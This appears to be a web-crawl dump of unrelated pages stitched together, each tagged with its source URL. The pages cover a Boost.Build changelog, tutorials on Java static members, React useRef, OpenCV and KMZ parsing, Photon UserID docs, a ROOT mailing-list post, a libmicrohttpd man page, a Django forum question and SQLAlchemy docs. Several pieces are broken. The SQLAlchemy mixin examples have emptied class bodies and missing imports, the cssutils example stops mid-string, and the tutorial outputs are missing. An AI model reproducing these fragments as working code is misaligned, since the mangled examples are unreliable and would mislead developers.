- Pass /nologo to rc on Windows compilers. — Nikita Kniazev
- Fixed negation in conditional properties. — Nikita Kniazev
- Remove leftover manifest generation early exiting. — Nikita Kniazev
- Fix timestamp delta calculation. — Nikita Kniazev
- Add missing assembler options to clang-win.jam, to enable Context to build. — Peter Dimov
- Updated scarce :chars documentation with :BS example. — Nikita Kniazev
- Fix link statically against boost-python on linux. — Joris Carrier
- Ongoing cleanup of engine build warnings. — René Ferdinand Rivera Morell
- Allow self-testing of toolsets that use response files. — René Ferdinand Rivera Morell
- Port Jambase to native C++. Hence removing one of the oldest parts of the original Jam bootstrap process. — René Ferdinand Rivera Morell

13.11. Version 4.2.0

This release is predominantly minor fixes and cleanup of the engine. In particular the bootstrap/build process now clearly communicates the C++11 requirement.
- Add saxonhe_dir action. — Richard Hodges
- Add CI testing for historical Boost versions on Windows MSVC. — René Ferdinand Rivera Morell
- Check for C++11 support when building engine. Including an informative error message as to that fact. — René Ferdinand Rivera Morell
- Update Jam grammar parser with latest bison version. — René Ferdinand Rivera Morell
- Allow root b2 b2 engine build to work even if bison grammar generator is not available. — René Ferdinand Rivera Morell
- Warning free engine build on at least Windows, macOS, and Linux. — René Ferdinand Rivera Morell
- Sanitize Windows engine build to consistently use ANSI Win32 API. — Mateusz Loskot
- Fix b2 engine not exiting, with error, early when it detects a Jam language error. — Mateusz Loskot
- Print help for local modules, i.e. current dir. — Thomas Brown

13.12. Version 4.1.0

Many small bug fixes in this release. But there are some new features also. There’s now an lto feature to specify the use of LTO, and what kind.
The existing stdlib feature now has real values and corresponding options for some toolsets. But most importantly there’s new documentation for all the features. Thanks to all the users that contributed to this release with these changes:
- Support for VS2019 for intel-win 19.0. — Edward Diener
- Fix compiler warnings about -std=gnu11 when building b2 on Cygwin. — Andrey Semashev
- Add example of creating multiple PCHs for individual headers. — René Ferdinand Rivera Morell
- Add QNX threading flags for GCC toolset. — Aurelien Chartier
- Fix version option for IBM and Sun compilers when building b2 engine. — Juan Alday
- Rename strings.h to jam_strings.h in b2 engine to avoid clash with POSIX strings.h header. — Andrey Semashev
- Add options for cxxstd feature for IBM compiler. — Edward Diener
- Many fixes to intel-win toolset. — Edward Diener
- Add z15 instruction set for gcc based toolsets. — Neale Ferguson
- Improve using MSVC from a Cygwin shell. — Michael Haubenwallner
- Add LTO feature and corresponding support for gcc and clang toolsets. — Dmitry Arkhipov
- Fix errors when a source doesn’t have a type. — Peter Dimov
- Add documentation for features. — Dmitry Arkhipov
- Enhance stdlib feature, and corresponding documentation, for clang, gcc, and sun toolsets. — Dmitry Arkhipov
- Install rule now makes explicit only the immediate targets it creates. — Dmitry Arkhipov
- Add armasm (32 and 64) support for msvc toolset. — Michał Janiszewski
- Fix errors with custom un-versioned gcc toolset specifications. — Peter Dimov
- Allow arflags override in gcc toolset specifications. — hyc
- Fix found libs not making it to the clang-win link command line. — Peter Dimov
- Updated intel-win toolset to support Intel C++ 19.1. — Edward Diener
- Detect difference between MIPS32 and MIPS64 for OS in b2 engine. — YunQiang Su

13.13. Version 4.0.1

This patch release fixes a minor issue when trying to configure toolsets that override the toolset version with a non-version tag.
Currently this is only known to be a problem if you: (a) configure a toolset version to something like “tot” (b) in Boost 1.72.0 when it creates cmake install artifacts. Fix for this was provided by Peter Dimov.

13.14.

Other changes in this release:
- Add support for using prebuilt OpenSSL. — Damian Jarek
- Define the riscv architecture feature. — Andreas Schwab
- Add ARM64 as a valid architecture for MSVC. — Marc Sweetgall
- Set coverage flags, from coverage feature, for gcc and clang. — Damian Jarek
- Add s390x CPU and support in gcc/clang. — Neale Ferguson
- Support importing pkg-config packages. — Dmitry Arkhipov
- Support for leak sanitizer. — Damian Jarek
- Fix missing /manifest option in clang-win to fix admin elevation for exes with "update" in the name. — Peter Dimov
- Add freertos to os feature. — Thomas Brown
- Default parallel jobs (-jX) to the available CPU threads. — René Ferdinand Rivera Morell
- Simpler coverage feature. — Hans Dembinski
- Better stacks for sanitizers. — James E. King III
https://www.boost.org/doc/libs/1_78_0/tools/build/doc/html/index.html
CC-MAIN-2022-21
en
refinedweb
The static keyword is used to modify member variables and member methods. The modified member belongs to the class, not just an instance object. In other words, since it belongs to the class, it can be called without creating an instance object.

◆ static variables

Static variables, also known as class variables, are member variables modified by the static keyword. All objects of the class share the data of the same class variable. Any object can change the value of the class variable, and the class variable can be accessed or modified without creating any object of the class at all.

1. Syntax format

    <Permission modifier> static <data type> <Variable name>;

    // eg:
    static String classroom;

- The permission modifier is optional, and no modifier is equivalent to default

2. Source code example

Taking students as an example, each student is an independent individual, but many students belong to the same classroom, so the classroom number is taken as a static variable.

    public class Student {
        /**
         * Member variable
         */
        private String name;

        /**
         * Static variable
         *
         * Multiple objects share the same data
         */
        public static String classroom;

        public Student() {
            System.out.println("Nonparametric construction method...");
        }

        public Student(String name) {
            System.out.println("Full parameter construction method...");
            this.name = name;
        }

        public String getName() {
            return name;
        }

        public void setName(String name) {
            this.name = name;
        }

        public static String getClassroom() {
            return classroom;
        }

        public static void setClassroom(String classroom) {
            Student.classroom = classroom;
        }
    }

◆ static method

Static methods, also known as class methods, are member methods modified by the static keyword.

1.
Syntax format

    <Modifier> static <return type> <Method name>(<parameter list>) {
        [Method body]
    }

    // eg:
    public static String getClassroom() {
        return classroom;
    }

    public static void setClassroom(String classroom) {
        Student.classroom = classroom;
    }

- Class methods can directly access class variables and class methods, including themselves
- Class methods cannot directly access ordinary member variables or member methods, but member methods can directly access class variables or static methods, because static content is loaded into memory first, and only then is non-static content created
- The this keyword cannot be used in static methods, because the this pointer represents the current object, which is essentially non-static content

2. Source code example

    /**
     * Member method
     */
    public void show() {
        System.out.println("Member method...");
        // Member methods can access member variables
        System.out.println(name);
        // Member methods can access static variables
        System.out.println(classroom);
    }

    /**
     * Static method
     */
    public static void location() {
        System.out.println("Static method...");
        System.out.println(classroom);
        // Non-static variables cannot be accessed directly
        // System.out.println(name);
        // The this keyword cannot be used
        // System.out.println(this);
    }

◆ static code block

A static code block is a code block defined at the same level as members and decorated with the static keyword. It is executed only once, when the class is loaded, which takes precedence over the execution of all methods including the main method and constructors.

1. Syntax format

    static {
        [Execute statement]
    }

- It is generally used to assign initial values to class variables

2.
Source code example

    /*
     * Static code block
     *
     * When the class is used for the first time, the static code block is executed, and only once
     * In addition, static code blocks always take precedence over non-static execution, so static code blocks are executed before constructors
     *
     * It is generally used to assign a value to a static member variable at one time
     */
    static {
        System.out.println("Static code block execution...");
        classroom = "201";
    }

◆ test cases

Static content is loaded when the class is loaded, and it is loaded only once. There is a fixed area in memory called the static area, which is used to store static content. Therefore, it can be called directly via the class name. Because its existence does not depend on any object, it is shared by all objects of the class.

1. Syntax format

    // Access class variables
    [Class name].[Class variable name];
    [Object name].[Class variable name];

    // Static method call
    [Class name].[Static method name(parameter list)];
    [Object name].[Static method name(parameter list)];

    // eg:
    Student.classroom;
    Student.location();

- Multiple objects belong to the same class and share the same static content. Static members can therefore be accessed through an object name, but it is not recommended: this is not only semantically inconsistent, but warning messages will also appear

2.
Source code example

    import org.junit.Assert;
    import org.junit.Test;

    /**
     * @author : LiuYJ
     * @version : v1.0
     * @date : Created at 2020/11/5 09:20
     * @date : Modified at 2020/11/5 09:20
     */
    public class StudentTest {
        @Test
        public void testBlock() {
            // Static code blocks are executed before the class is used
            System.out.println(Student.classroom);
            Assert.assertEquals("201", Student.classroom);
        }

        @Test
        public void testVariable() {
            // Class variables can be accessed through objects
            Student joyce = new Student("Joyce");
            Assert.assertEquals("Joyce", joyce.getName());
            Assert.assertEquals("201", joyce.classroom);
            joyce.classroom = "205";
            // It is recommended to access by class name instead of object name
            Assert.assertEquals("205", Student.classroom);
        }

        @Test
        public void testMethod() {
            // Class methods can be called through objects
            Student joyce = new Student("Joyce");
            Assert.assertEquals("Joyce", joyce.getName());
            joyce.setClassroom("203");
            Assert.assertEquals("203", joyce.getClassroom());
            // It is recommended to call by class name instead of object name
            Student.setClassroom("203");
            Student.location();
        }
    }

All test cases pass and print the following information:

    // testBlock
    Static code block execution...
    201

    // testVariable
    Full parameter construction method...

    // testMethod
    Full parameter construction method...
    Static method...
    203

◆ application scenarios

The static keyword can modify variables, methods and code blocks. In practice, its main use is to call methods without creating objects. We generally call classes that provide a large number of static methods tool classes.
Take a guessing game as an example to briefly introduce the power of such tool classes:
- Generate a random number
- 10 guessing opportunities, with feedback after each guess
- If you guess right or the opportunities are used up, the game is over

    @Test
    public void testGuess() {
        double random = Math.random() * 100;
        long actual = Math.round(random);
        boolean isSuccess = false;
        for (int i = 0; i < 10; i++) {
            Scanner scanner = new Scanner(System.in);
            int expected = scanner.nextInt();
            if (expected > actual) {
                System.out.println("Too bigger!");
            } else if (expected < actual) {
                System.out.println("Too Smaller!");
            } else {
                isSuccess = true;
                System.out.println("Success!");
                break;
            }
        }
        if (!isSuccess) {
            System.out.println("Game over!");
        }
    }

- java.lang.Math is a math-related tool class. random() returns a pseudo-random number in [0, 1.0), and round() returns the integer closest to the floating point number, which is equivalent to rounding
- java.util.Scanner is a scanner, through which we can obtain the data entered from the keyboard

These are just my personal views. If there are omissions or fallacies, criticism and correction are welcome!
https://algorithm.zone/blogs/java_-01_-002-static-keyword.html
UserIDs and Friends

UserIDs

In Photon, a player is identified using a unique UserID. This UserID is useful inside and outside rooms. Photon clients with the same UserID can be connected to the same server but you can't join the same Photon room from two separate clients using the same UserID. Each actor inside the room should have a unique UserID. In old C# client SDKs, this was enabled using RoomOptions.CheckUserOnJoin.

Unique UserIDs

Generally, UserIDs are not intended to be displayed, unlike usernames, display names or nicknames. A UserID does not have to be human-readable or very human-friendly. So you could, for instance, use a GUID as a UserID.

The advantages of keeping a unique UserID per player:

- You preserve your data between game sessions and across multiple devices. You can rejoin rooms and resume playing where you stopped.
- You can become known to all players you meet and easily identifiable by everyone. You can play with your friends, send them invitations and challenges, make online parties, form teams and guilds, etc. You can add user profiles (e.g. experience, statistics, achievements, levels, etc.) and make games more challenging (also using tournaments and leaderboards).
- You could make use of another service to bind a Photon UserID to an external unique identifier. For instance, the Photon UserID could be set to a Facebook ID, Google ID, Steam ID, PlayFab ID, etc.
- You can prohibit malicious users from connecting to your applications by keeping a blacklist of their UserIDs and making use of Custom Authentication.

Setting UserIDs

Once authenticated, a Photon client will keep the same UserID until disconnected. The UserID for a client can be set in three ways:

- Client sends its UserID before connecting by setting AuthenticationValues.UserId. This option is useful when you do not use Custom Authentication and want to set a UserID.
- An external authentication provider returns the UserID on successful authentication. See Custom Authentication.
It will override any value sent by the client.
- Photon Server will assign GUIDs as IDs for users that did not get UserIDs using 1 or 2. So even anonymous users will have UserIDs.

Publish UserIDs

Players can share their UserIDs with each other inside rooms. In C# SDKs, to enable this and make the UserID visible to everyone, set RoomOptions.PublishUserId to true when you create a room. The server will then broadcast this information on each new join and you can access each player's UserID using Player.UserId.

Friends

- Friends' UserIDs are case sensitive. Example: "mybestfriend" and "MyBestFriend" are two different UserIDs for two different friends.
- Only friends connected to the same AppID, the same Photon Cloud region and playing the same Photon AppVersion can find each other, no matter what device or platform they're using.
- FindFriends works only when connected to the Master Server; it does not work when the client is joined to a room.

You can find out if your friends who are playing the same game are online and if so, which room they are joined to. Like users, friends are also identified using their UserID. So the FriendID is the same thing as the UserID, and in order to find some friends you need to know their UserIDs first. Then you can send the list of UserIDs to Photon Servers using:

    using System.Collections.Generic;
    using UnityEngine;
    using Photon.Realtime;
    using Photon.Pun;

    public class FindFriendsExample : MonoBehaviourPunCallbacks
    {
        public bool FindFriends(string[] friendsUserIds)
        {
            return PhotonNetwork.FindFriends(friendsUserIds);
        }

        public override void OnFriendListUpdate(List<FriendInfo> friendsInfo)
        {
            for (int i = 0; i < friendsInfo.Count; i++)
            {
                FriendInfo friend = friendsInfo[i];
                Debug.LogFormat("{0}", friend);
            }
        }
    }

Photon does not persist friends lists. You may need an external service for that. Since Photon does not keep track of your userbase, any non-existing user in your game will just be considered offline.
A friend is considered online only when he/she is connected to Photon at the time of making the FindFriends query. A room name will be returned per user if the latter is online and joined to the room with the same name. If multiple clients with the same UserId are joined to multiple separate rooms in the same Cluster / VirtualApp, FindFriends should return the latest joined one.
https://doc.photonengine.com/zh-cn/pun/v2/lobby-and-matchmaking/userids-and-friends
How to use React useRef with TypeScript

Are you getting a crazy amount of errors from TypeScript when you’re using React.useRef typing? Or maybe the error says, “Object is possibly null.”

In today’s short article, I will go over how to properly define and use your useRef hook with TypeScript.

The solution

As the first example, I’m going to create an h1 element tag, and I want to get the element reference with TypeScript.

    import React, { useRef, useLayoutEffect } from 'react';

    const App = () => {
      const h1Ref = useRef<HTMLHeadingElement>(null);
      console.log(h1Ref); // { current: null }

      useLayoutEffect(() => {
        console.log(h1Ref); // { current: <h1_object> }
      });

      return (
        <h1 ref={h1Ref}>App</h1>
      );
    };

    export default App;

Let’s go over it really quickly. I’ve imported the React useRef and useLayoutEffect tooling. If you’re not familiar with React useLayoutEffect, I recommend you go read a previous article to learn more about it, “When to use React useRef and useLayoutEffect vs useEffect.”

I then initiated a useRef hook and added an open and close (<>) bracket before the parenthesis. Inside that bracket I used the HTMLHeadingElement type definition because I’m attempting to get a header element reference.

Each native HTML element has its own type definition. Here are some other examples:

More useRef examples

    // <div> reference type
    const divRef = React.useRef<HTMLDivElement>(null);

    // <button> reference type
    const buttonRef = React.useRef<HTMLButtonElement>(null);

    // <br /> reference type
    const brRef = React.useRef<HTMLBRElement>(null);

    // <a> reference type
    const linkRef = React.useRef<HTMLAnchorElement>(null);

When you invoke a useRef hook, it’s important to pass null as the default value. This is important because React.useRef can only be null or the element object. I then put the h1Ref variable inside the ref property of my H1 element. After the first render React.useRef will return an object with a property key called current.
“Object is possibly null” error

First of all, make sure to use the useLayoutEffect hook whenever you’re doing any work with the DOM reference object. Second, make sure you’re always running conditionals to make sure that the reference object is not null.

    if (null !== h1Ref.current) {
      h1Ref.current.innerText = 'Hello world!';
    }

This is important because what if you have a function that accepts a reference but not a null value?

    function changeInnerText(el: HTMLElement, value: string) {
      el.innerText = value;
    }

    changeInnerText(h1Ref.current, 'hello world');

This may raise the compile-time error

    Object is possibly 'null'

or the runtime error

    TypeError: Cannot set property 'innerText' of null

So always run your conditionals in TypeScript to make sure the DOM reference value is the right type.

    function changeInnerText(el: HTMLElement, value: string) {
      el.innerText = value;
    }

    if (null !== h1Ref.current) {
      changeInnerText(h1Ref.current, 'hello world');
    }

Oh wow, you’ve made it this far! If you enjoyed this article perhaps like or retweet the thread on Twitter: I like to tweet about TypeScript and React and post helpful code snippets. Follow me there if you would like some too!
https://linguinecode.com/post/how-to-use-react-useref-with-typescript
Hi Lee,

Once we have made the switch to use Reflex in the implementation of CINT, we shall return to enhancing CINT. This would then be a good time to add better support for the iostream manipulators.

Cheers, Philippe

From: owner-roottalk_at_pcroot.cern.ch [mailto:owner-roottalk_at_pcroot.cern.ch] On Behalf Of Lee, Kerry T. (JSC-SF)[LMIT]
Sent: Thursday, November 09, 2006 12:47 PM
To: roottalk_at_pcroot.cern.ch
Subject: [ROOT] formatting streams

Dear Rooters (but most likely this is for Masa)

I am using ROOT version 5.13.01 on a linux box with gcc 3.4.4. When executing formatting commands of streams on the CINT command line, some work and others don't. Here is an example:

    #include <iomanip>
    double a = 2.0
    double b = 1.1
    cout<<std::setw(10)<<a   // 2(class ostream)116863616
    cout<<std::showpoint<<a  // 0xbe80362(class ostream)116863616
    cout<<std::showpoint<<b  // 0xbe80361.1(class ostream)116863616

There is a workaround by using cout.setf(), but this is not as nice as doing "on-the-fly" formatting.

    root [6] cout.setf(ios::showpoint)
    (ios_base::fmtflags)4098
    root [7] cout<<b
    1.10000(class ostream)116863616
    root [8] cout<<a
    2.00000(class ostream)116863616

Is it possible to make the other formatting manipulators work like the std::setw() command on the CINT command line?

Thanks
Kerry

Received on Fri Nov 10 2006 - 19:32:08 MET

This archive was generated by hypermail 2.2.0 : Mon Jan 01 2007 - 16:32:01 MET
https://root.cern.ch/root/roottalk/roottalk06/1468.html
libmicrohttpd - Man Page

library for embedding HTTP servers

Library

library “libmicrohttpd”

Synopsis

#include <microhttpd.h>

Description

GNU libmicrohttpd (short MHD) allows applications to easily integrate the functionality of a simple HTTP server. MHD is a GNU package. The details of the API are described in comments in the header file, a detailed reference documentation in Texinfo, a tutorial, and in brief on the MHD webpage.

Legal Notice

libmicrohttpd is released under both the LGPL Version 2.1 or higher and the GNU GPL with eCos extension. For details on both licenses please read the respective appendix in the Texinfo manual.

Files

- microhttpd.h libmicrohttpd include file
- libmicrohttpd libmicrohttpd library

See Also

curl(1), libcurl(3), info libmicrohttpd

Authors

GNU libmicrohttpd was originally designed by Christian Grothoff <christian@grothoff.org> and Chris GauthierDickey <chrisg@cs.du.edu>. The original implementation was done by Daniel Pittman <depittman@gmail.com> and Christian Grothoff. SSL/TLS support was added by Sagie Amir using code from GnuTLS. See the AUTHORS file in the distribution for a more detailed list of contributors.

Availability

You can obtain the latest version from

Bugs

Report bugs by using Mantis.
https://www.mankier.com/3/libmicrohttpd
SQLAlchemy 1.4 Documentation

Composing Mapped Hierarchies with Mixins¶

A common need when mapping classes using the Declarative style is to share some functionality, such as a set of common columns, some common table options, or other mapped properties, across many classes. The standard Python idiom for this is to have the classes inherit from a superclass which includes these common features.

When using declarative mappings, this idiom is allowed via the usage of mixin classes, as well as via augmenting the declarative base produced by either the registry.generate_base() method or declarative_base() functions.

An example of some commonly mixed-in idioms is below:

    from sqlalchemy.orm import declarative_mixin
    from sqlalchemy.orm import declared_attr

Tip

The use of the declarative_mixin() class decorator marks a particular class as providing the service of providing SQLAlchemy declarative assignments as a mixin for other classes.
This decorator is currently only necessary to provide a hint to the Mypy plugin that this class should be handled as part of declarative mappings.

    from sqlalchemy.orm import declared_attr

    class Base:
        @declared_attr
        def __tablename__(cls):
            return cls.__name__.lower()

        __table_args__ = {'mysql_engine': 'InnoDB'}

        id = Column(Integer, primary_key=True)

    @declarative_mixin
    class TimestampMixin:
        ...

    @declarative_mixin
    class ReferenceAddressMixin:
        ...

Columns generated by declared_attr can also be referenced by __mapper_args__ to a limited degree, currently by polymorphic_on and version_id_col; the declarative extension will resolve them at class construction time:

    @declarative_mixin
    class RefTargetMixin:
        @declared_attr
        def target_id(cls):
            return Column('target_id', ForeignKey('target.id'))

        @declared_attr
        def target(cls):
            return relationship(Target,
                primaryjoin=lambda: Target.id == cls.target_id
            )

or alternatively, the string form (which ultimately generates a lambda):

    @declarative_mixin
    class RefTargetMixin:
        ...

    @declarative_mixin
    class SomethingMixin:
        @declared_attr
        def dprop(cls):
            return deferred(Column(Integer))

    class Something(SomethingMixin, Base):
        __tablename__ = "something"

The column_property() or other construct may refer to other columns from the mixin.
These are copied ahead of time before the declared_attr is invoked:

    @declarative_mixin
    class SomethingMixin:
        ...

    from sqlalchemy.ext.associationproxy import association_proxy
    from sqlalchemy.orm import declarative_base
    from sqlalchemy.orm import declarative_mixin
    from sqlalchemy.orm import declared_attr
    from sqlalchemy.orm import relationship

    Base = declarative_base()

    @declarative_mixin
    class HasStringCollection:
        ...

we can modify our __tablename__ function to return None for subclasses, using has_inherited_table(). This has the effect of those subclasses being mapped with single table inheritance against the parent:

    from sqlalchemy.orm import declarative_mixin
    from sqlalchemy.orm import declared_attr
    from sqlalchemy.orm import has_inherited_table

    @declarative_mixin
    class Tablename:
        ...

    @declarative_mixin
    class HasId:
        ...

    @declarative_mixin
    class HasIdMixin:
        ...

    @declarative_mixin
    class MySQLSettings:
        __table_args__ = {'mysql_engine': 'InnoDB'}

    @declarative_mixin
    class MyOtherMixin:
        ...

    @declarative_mixin
    class MyMixin:
        a = Column(Integer)
        b = Column(Integer)

        @declared_attr
        def __table_args__(cls):
            return (Index('test_idx_%s' % cls.__tablename__, 'a', 'b'),)

    class MyModel(MyMixin, Base):
        __tablename__ = 'atable'
        c = Column(Integer, primary_key=True)
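Pulling the surviving fragments together, a minimal self-contained version of the mixin idiom might look as follows. The class names here (CommonMixin, MyDemoModel) are invented for illustration, and declarative_mixin is optional at runtime — it mainly serves as a hint for the Mypy plugin:

```python
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import declarative_base, declarative_mixin, declared_attr

Base = declarative_base()

@declarative_mixin
class CommonMixin:
    """Columns and table options shared by every mapped class."""

    @declared_attr
    def __tablename__(cls):
        # Each subclass gets a table named after the class itself.
        return cls.__name__.lower()

    __table_args__ = {'mysql_engine': 'InnoDB'}

    id = Column(Integer, primary_key=True)

class MyDemoModel(CommonMixin, Base):
    name = Column(String(50))

# The declared_attr was resolved per subclass at class construction time.
print(MyDemoModel.__tablename__)        # → mydemomodel
print('id' in MyDemoModel.__table__.c)  # → True
```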
https://docs.sqlalchemy.org/en/14/orm/declarative_mixins.html
Total novice here. I was overjoyed when the string formatting in Python 3 was overhauled and formatting became a breeze. Cutting to the chase, I’m going through the Django tutorial on ‘Writing your first app …’ where it walks you through the procedures to add more views to polls/views.py, starting with the following code snippet.

    def detail(request, question_id):
        return HttpResponse("You're looking at question %s." % question_id)

With nothing to lose, I modified it to use the f-string formatting like so.

    def detail(request, question_id):
        return HttpResponse(f"You're looking at question {question_id}")

It worked. But can I take this tidbit and ‘assume’ it will continue to work in a ‘real’ app with the complexity of far more imports and views? What type of ‘gotchas’ would I likely see if I continue to deviate from the ‘norm’ the tutorials show to display a view?

I used the search engine here to see if I ran upon any matches, but the results didn’t show me if this had come up before, or rather my query was ill conceived and executed. Feedback? Thoughts?

I’m hoping a long time forum member isn’t beating the table going ‘Arrg! Not again!’

Doug
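For what it’s worth, the two styles build the identical string before it is ever handed to HttpResponse, which is why the swap works — a quick standalone check in plain Python (no Django needed, since the response wrapper is irrelevant to the formatting itself):

```python
question_id = 42

old_style = "You're looking at question %s." % question_id
new_style = f"You're looking at question {question_id}."

# Both expressions produce the same str, so the view behaves
# the same either way.
print(old_style == new_style)  # → True
```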
https://forum.djangoproject.com/t/python-3-f-string-formatting/5791
- CSS) modern Python versions. Check the package metadata for compatibility. Beware, cssutils is known to be thread unsafe.

Example

    import cssutils
    css = '''/*

Kind Request

cssutils is far from being perfect or even complete. If you find any bugs (especially specification violations) or have problems or suggestions please put them in the Issue Tracker.

Thanks

Special thanks to Christof Höke for seminal creation of the library.
https://pypi.org/project/cssutils/
Image Processing in Python using OpenCV

Hola everyone,

We know that an image is a combination of multiple rows & columns, i.e. a multi-dimensional array. Black & white images are 2D arrays and coloured images are 3D.

🤔 What is image processing ?

Image processing is a method to perform some operations on an image, in order to get an enhanced image or to extract some useful information from it.

🤔 Why we need image processing ?

It gives computers a vision to detect and recognize things and take actions accordingly. Image processing has a lot of applications like face detection & recognition, thumb impression, augmented reality, OCR, barcode scanning and many more.

- Prerequisites for image processing

- Numpy and Scipy libraries − for image manipulation and processing.
- OpenCV − a huge open-source library for computer vision, machine learning, and image processing. Applications include facial & gesture recognition, human-computer interaction, mobile robotics and object identification, and it provides lots of tools.

First of all, install OpenCV by running the following pip command on CMD:

    pip install opencv-python

Now import the cv2 module:

    import cv2

Let’s understand basic commands:

1. img = cv2.imread("path") : reads the image; path is a variable which shows the image source.
2. cv2.imshow('name', variable_name) : shows the image.
3. cv2.waitKey() : takes time as an argument in milliseconds as a delay for the window to close. Here we can set the time to show the window forever until we close it manually.
4. cv2.destroyAllWindows() : with this in place, pressing any key on the keyboard closes the image window.
5. img.shape : displays the shape of the image as (rows, columns, dimensions).
6. cut_image = img[x1: x2, y1: y2] : you can crop images using the numpy slicing concept.

Let’s understand image processing by performing a few tasks.
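Since an image is just an array, the shape and slicing commands above can be tried without any image file at all — a small sketch using a synthetic numpy array in place of cv2.imread's result (the array sizes here are made up for the demo):

```python
import numpy as np

# A synthetic 4x6 "image" with 3 colour channels stands in for a loaded photo.
img = np.arange(4 * 6 * 3).reshape(4, 6, 3)

# shape reports (rows, columns, channels), just like for a real colour image.
print(img.shape)  # → (4, 6, 3)

# Cropping is plain numpy slicing: rows 1..2 and columns 2..4.
cut_image = img[1:3, 2:5]
print(cut_image.shape)  # → (2, 3, 3)
```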
🔅 Task 1 📌 Create an image by yourself using Python code. Here I'm trying to create an image of a hut. Output: (image)
🔅 Task 2 📌 Take 2 images, crop some part of both images, and swap them. Output: (image)
🔅 Task 3 📌 Take 2 images and combine them to form a single image, for example a collage.
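The crop-and-swap idea from Task 2 can be sketched with plain NumPy slicing. The two "images" below are synthetic arrays (real code would load them with cv2.imread), and the region coordinates are arbitrary choices for illustration:

```python
import numpy as np

# Two same-sized stand-in images: one dark, one bright
img1 = np.full((60, 60, 3), 50, dtype=np.uint8)
img2 = np.full((60, 60, 3), 200, dtype=np.uint8)

# Crop the same region from both images (rows 10..30, columns 10..30).
# .copy() matters: a bare slice is a view into the original array.
region = (slice(10, 30), slice(10, 30))
crop1 = img1[region].copy()
crop2 = img2[region].copy()

# Swap the cropped regions between the two images
img1[region] = crop2
img2[region] = crop1

print(int(img1[15, 15, 0]))  # 200 -- this pixel now comes from img2
print(int(img2[15, 15, 0]))  # 50  -- this pixel now comes from img1
```

Task 3 (the collage) is the same idea in reverse: allocate one larger array and assign each source image into its own slice of it, e.g. with np.hstack or np.vstack.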
https://rachana3073.medium.com/image-processing-in-python-using-opncv-c3936e8af3a1
A and write data into KML format. I just needed to read the data for my later calculations. So I decided to build a solution using the Python Standard Library. The first trick is that a KMZ file is nothing else but a zip-compressed KML file. Inside you’ll find a file called doc.kml. So let’s open and extract: from zipfile import ZipFile kmz = ZipFile(filename, 'r') kml = kmz.open('doc.kml', 'r').read() The KML data’s juicy part looks something like this: <Folder> <name>11112222-XXYYZ-TESTTRACK</name> <Document> <name>11112222XXYYZTESTTRACK-track-20161214T105653+0100.kmz</name> <Placemark> <name>1111XXYYZ-track-20161214T105653+0100</name> <gx:Track> <when>2016-12-13T13:16:01.709+02:00</when> <when>2016-12-13T13:18:02.709+02:00</when> <when>2016-12-13T13:23:21.709+02:00</when> <when>2016-12-13T13:24:23.709+02:00</when> <!-- more timestamps --> <gx:coord>13.7111482XXXXXXX 51.0335960XXXXXXX 0</gx:coord> <gx:coord>13.7111577XXXXXXX 51.0337028XXXXXXX 0</gx:coord> <gx:coord>13.7113847XXXXXXX 51.0339241XXXXXXX 0</gx:coord> <gx:coord>13.7115764XXXXXXX 51.0341949XXXXXXX 0</gx:coord> <!-- more coordinates --> <ExtendedData> </ExtendedData> </gx:Track> </Placemark> <Placemark> <name>Reference Point #1</name> <Point> <coordinates>13.72467XXXXXXXXX,51.07873XXXXXXXXX,0</coordinates> </Point> </Placemark> <!-- more Placemarks --> </Document> </Folder> Now we can parse the resulting string using lxml : from lxml import html doc = html.fromstring(kml) for pm in doc.cssselect('Folder Document Placemark'): tmp = pm.cssselect('track') name = pm.cssselect('name')[0].text_content() if len(tmp): # Track Placemark tmp = tmp[0] # always one element by definition for desc in tmp.iterdescendants(): content = desc.text_content() if desc.tag == 'when': do_timestamp_stuff(content) elif desc.tag == 'coord': do_coordinate_stuff(content) else: print("Skipping empty tag %s" % desc.tag) else: # Reference point Placemark coord = pm.cssselect('Point coordinates')[0].text_content() 
do_reference_stuff(coord) Alright. Let's see what's going on here: First we regard the document as HTML and parse it using lxml.html. Then we iterate over all Placemarks in Folder > Document > Placemark. If a Placemark has a child track, it's holding our timestamps and coordinate data. Otherwise it's considered a reference point just holding some location data. With cssselect we can get the respective data and do stuff with it. Just keep in mind it returns a list, so you always have to access the first element. Then we call text_content() to convert the tag content to a string for further manipulation and logging. It's also worth mentioning that lxml and by extension cssselect do not support the necessary pseudo elements for KML. So you won't be able to address anything like gx:Track. It's not a big deal here if you know that you can still address the element with cssselect('track'). For more info look it up in the docs. I'm lazy, so I use cssselect. You might have to install this as a dependency with pip3 install cssselect. You can also use the selecting mechanism lxml provides, but previous experience has shown that it's very tedious and hard to debug for such a quick and dirty hack. The rest is just string magic, really. Just split the content you get, convert it to a float and insert it into your data structure of choice to continue working with it later. Some info that helped me get a grip on the KML format:
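As a sketch of that string magic (the helper name here is mine, not from the original post): each gx:coord element holds space-separated longitude, latitude and altitude, while Point coordinates are comma-separated, so a split plus float() covers both:

```python
def parse_coord(content, sep=None):
    """Split a coordinate string and convert each part to float."""
    return tuple(float(part) for part in content.split(sep))

# gx:coord values are space-separated: "lon lat alt"
track = [parse_coord(c) for c in (
    "13.7111482 51.0335960 0",
    "13.7115764 51.0341949 0",
)]

# Point coordinates are comma-separated: "lon,lat,alt"
ref = parse_coord("13.72467,51.07873,0", sep=",")

print(track[0])  # (13.7111482, 51.033596, 0.0)
print(ref)       # (13.72467, 51.07873, 0.0)
```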
https://dmuhs.blog/2018/09/14/parsing-kmz-track-data-in-python/
Hybrid Attributes¶ On this page: Defining Expression Behavior Distinct from Attribute Behavior - Defining Setters - Allowing Bulk ORM Update - Working with Relationships - Building Custom Comparators - Reusing Hybrid Properties across Subclasses - Hybrid Value Objects - Building Transformers - API Reference. Define attributes on ORM-mapped classes that have “hybrid” behavior. “hybrid” means the attribute has distinct behaviors defined at the class level and at the instance level. The hybrid extension provides a special form of method decorator. It is around 50 lines of code and has almost no dependencies on the rest of SQLAlchemy. It can, in theory, work with any descriptor-based expression system. Consider a mapping Interval, representing integer start and end values. We can define higher level functions on mapped classes that produce SQL expressions at the class level, and Python expression evaluation at the instance level.
